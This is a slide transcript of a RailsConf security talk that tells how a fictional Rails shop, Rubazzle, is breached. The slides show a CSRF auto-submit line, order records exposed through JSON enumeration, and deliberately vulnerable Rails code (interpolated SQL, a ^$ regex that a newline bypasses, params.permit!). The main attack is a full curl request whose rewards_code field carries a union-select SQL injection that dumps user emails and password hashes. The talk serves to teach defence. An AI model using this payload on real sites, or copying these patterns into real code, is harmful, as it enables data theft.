Tales from the Crypt

Transcript

1. Tales from the Crypt:
   Rubazzle
   Justin Collins
   Aaron Bedra
   Matt Konda
   

   View Slide

2. View Slide

3. Monday, Rubazzle
   office, 8:42am
   

   View Slide

4. Started POST "/orders" for 127.0.0.1 at 2014-04-23
   12:07:54 -0500
   !
   Processing by OrdersController#create as HTML
   Parameters: {"utf8"=>"✓", “order"=>
   {"product"=>"Rubazzle Case (MBP 13 Retina)",
   "quantity"=>"5", "price"=>"100.00",
   "cc"=>"4111111111111111", "cvv"=>"123",
   "expiration"=>"4/28/17", "first_name"=>"Aaron",
   "last_name"=>"Bedra"}, "commit"=>"Create Order"}
   !
   Request tracked from partner:
   http://wowsodogememe.com/view.php?id=31337
   !
   Redirected to http://www.rubazzle.com/orders/2349
   Completed 302 Found in 35ms (ActiveRecord: 5.8ms)
   

   View Slide

5. Started POST "/orders" for 127.0.0.1 at 2014-04-23
   12:07:54 -0500
   !
   Processing by OrdersController#create as HTML
   Parameters: {"utf8"=>"✓", “order"=>
   {"product"=>"Rubazzle Case (MBP 13 Retina)",
   "quantity"=>"5", "price"=>"100.00",
   "cc"=>"4111111111111111", "cvv"=>"123",
   "expiration"=>"4/28/17", "first_name"=>"Aaron",
   "last_name"=>"Bedra"}, "commit"=>"Create Order"}
   !
   Request tracked from partner:
   http://wowsodogememe.com/view.php?id=31337
   !
   Redirected to http://www.rubazzle.com/orders/2349
   Completed 302 Found in 35ms (ActiveRecord: 5.8ms)
   

   View Slide

6. View Slide

7. View Slide

8. !
   !
   !
   !
   !
   document.getElementById("rubazzle").submit()
   

   View Slide

9. class ApplicationController <
   ActionController::Base
   # Prevent CSRF attacks by raising an exception.
   # protect_from_forgery with: :exception
   !
   def track_partner
   logger.debug("Request tracked from partner:
   #{request.env["HTTP_REFERER"]}")
   end
   end
   

   View Slide

10. Monday, Rubazzle
    office, 10:00am
    

    View Slide

11. Started GET "/orders/2.json" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"2"}
    Request tracked from partner:
    Order Load (0.4ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 2]]
    Rendered orders/show.json.jbuilder (0.7ms)
    Completed 200 OK in 6ms (Views: 4.1ms | ActiveRecord: 0.4ms)
    !
    !
    Started GET "/orders/3" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as */*
    Parameters: {"id"=>"3"}
    Request tracked from partner:
    Order Load (0.3ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 3]]
    Rendered orders/show.html.erb within layouts/application (0.5ms)
    Rendered layouts/_navigation_links.html.erb (0.9ms)
    Rendered layouts/_navigation.html.erb (5.8ms)
    Rendered layouts/_messages.html.erb (0.1ms)
    Completed 200 OK in 32ms (Views: 29.6ms | ActiveRecord: 0.3ms)
    !
    !
    Started GET "/orders/3.json" for 75.28.130.156 at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"3"}
    Request tracked from partner:
    Order Load (0.3ms) SELECT "orders".* FROM "orders" WHERE "orders"."id" = $1 LIMIT 1 [["id", 3]]
    Rendered orders/show.json.jbuilder (0.5ms)
    Completed 200 OK in 5ms (Views: 3.2ms | ActiveRecord: 0.3ms)
    

    View Slide

12. Started GET "/orders/2.json" for 75.28.130.156
    at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"2"}
    Rendered orders/show.json.jbuilder (0.7ms)
    Completed 200 OK in 6ms
    !
    Started GET "/orders/3.json" for 75.28.130.156
    at 2014-04-23 13:57:28 -0500
    Processing by OrdersController#show as JSON
    Parameters: {"id"=>"3"}
    Rendered orders/show.json.jbuilder (0.5ms)
    Completed 200 OK in 5ms
    

    View Slide

13. View Slide

14. View Slide

15. View Slide

16. Most requested
    ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
    OrdersController#show.JSON ┃ 130 hits ┃ 28.7% ┃ ░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
    OrdersController#show.*/* ┃ 97 hits ┃ 21.0% ┃ ░░░░░░░░░░░░░░░░░░░░░░░
    HomeController#index.HTML ┃ 83 hits ┃ 15.8% ┃ ░░░░░░░░░░░░░░░░░░
    

    View Slide

17. View Slide

18. {
    "id":2,
    "product":"a",
    "quantity":,
    "price":"3.0",
    "cc":"143423433234342234",
    "cvv":"342",
    "expiration":"May,2010",
    "first_name":"Matt",
    "last_name":"Konda",
    "created_at":"2014-04-22T20:11:39Z",
    "updated_at":"2014-04-22T20:11:50Z"
    }
    

    View Slide

19. Monday, Rubazzle
    office, 3:00pm
    

    View Slide

20. View Slide

21. View Slide

22. View Slide

23. View Slide

24. @qualifying_orders =
    Order.where("rewards_code =
    '#{current_user.rewards_code}'")
    

    View Slide

25. validates_format_of :rewards_code,
    :with => /^[a-z0-9]+$/i
    

    View Slide

26. def update
    @user = User.find(params[:id])
    authorize @user
    if @user.update_attributes(params.permit!)
    redirect_to users_path,
    :notice => "User updated."
    else
    redirect_to users_path,
    :alert => "Unable to update user."
    end
    end
    

    View Slide

27. !
    curl 'http://www.rubazzle.com/users' -H 'Cookie: request_method=GET;
    _rubazzle_session=Y05oRmJqTFpEcXhaQ01QNEh4dXU5Z1BLd0dBNDBFc2VuNDRnek
    lwZlpCMUV4VlN1cCtpYTdhUnhWd01mV2ovTjlMRmJHWTcyc29RaWNOSGE1NjhBUTFJMV
    o4SThPTG4xcjNiM1hXc2hKUU5ZZkpvOGI4dis5dGw3TlU0L0VMMEg1NHpzODVqYmdlcV
    U2YzVERHBkb3hFdmZGeTB6VXVNOFpCTi9IZUtaTDlQMUxuODRTb0JSaW5GNGZhZzhSdU
    pIdjVKVDNUbC94NzRnaDlJdW5vWjVVaVZJUjJSQmVUYU1RZnB5Tm1Icmw0UT0tLVFSan
    A0TVh2a3FZbDcreG50Z0p6REE9PQ%3D
    %3D--51a22556b9f2567c46943497f09d03680ecde340' -H 'Origin: http://
    www.rubazzle.com' -H 'Accept-Encoding: gzip,deflate,sdch' -H
    'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0
    (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/34.0.1847.116 Safari/537.36' -H 'Content-Type:
    application/x-www-form-urlencoded' -H 'Accept: text/
    html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/
    *;q=0.8' -H 'Cache-Control: max-age=0' -H 'Referer: http://
    www.rubazzle.com/users/edit' -H 'Connection: keep-alive' --data
    'utf8=%E2%9C
    %93&_method=put&authenticity_token=HDN82RYSeMrhOi8gMCTPp9OWBdA9lJmXj
    tJvnSAOz2U%3D&user%5Bname%5D=Ronica2+Rails&user%5Bemail%5D=ronika
    %40jemurai.com&user%5Bpassword%5D=&user%5Brewards_code%5D=a%0A
    %27%29+union+select+id%2C+%27product%27%2C+1%2C+1%2C+%27cc%27%2C+
    %27cvv%27%2C+%27expiration%27%2C+email+as+first_name%2C
    +encrypted_password+as+last_name%2C+created_at%2C+updated_at%2C+id
    %2C+%27reward%27+from+users%3B+--&user%5Bpassword_confirmation
    %5D=&user%5Bcurrent_password%5D=password&commit=Update' --compressed
    

    View Slide

28. UPDATE "users"
    SET "rewards_code" = $1, "updated_at" = $2
    WHERE "users"."id" = 24
    !
    [["rewards_code", "a\n') union select id,
    'product', 1, 1, 'cc', 'cvv',
    'expiration',
    email as first_name,
    encrypted_password as last_name,
    created_at, updated_at, id, 'reward'
    from users; --"], ["updated_at",
    "2014-04-23 22:20:40.344101"]]
    

    View Slide

29. SELECT "orders".* FROM "orders"
    WHERE
    (rewards_code = 'a')
    union select id, 'product', 1, 1,
    'cc', 'cvv', 'expiration', email
    as
    first_name, encrypted_password
    as
    last_name, created_at, updated_at,
    id, 'reward' from users; --')
    

    View Slide

30. View Slide

31. Tuesday, Rubazzle
    office, 8:00am
    

    View Slide

32. Thanks!
    Resources!
    • rails-sqli.org
    • guides.rubyonrails.org/security.html
    • www.owasp.org/index.php/Ruby_on_Rails_Cheatsheet
    Us!
    • @abedra
    • @mkonda
    • @presidentbeef
    Thanks Railsconf!
    

    View Slide